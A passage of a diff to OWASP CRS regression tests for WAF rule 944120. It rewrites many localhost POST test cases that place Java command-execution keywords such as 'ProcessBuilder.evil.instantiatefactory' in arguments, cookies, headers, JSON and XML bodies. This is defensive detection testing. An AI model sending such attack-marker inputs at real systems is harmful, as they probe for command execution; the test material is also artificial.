\"ProcessBuilder.evil.forclosure\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" + output: + log: + expect_ids: [944120] + - test_id: 30 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.forclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-32 + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.forclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-33 + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.forclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-34 + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.forclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-35 + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 35 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 36 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory=test" + output: + log: + expect_ids: [944120] + - test_id: 37 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 38 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 39 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 40 desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 41 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 42 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 43 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 44 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 45 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 46 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" + output: + log: + expect_ids: [944120] + - test_id: 47 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-49 + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-50 + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-51 + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-52 + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 52 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 53 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer=test" + output: + log: + expect_ids: [944120] + - test_id: 54 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 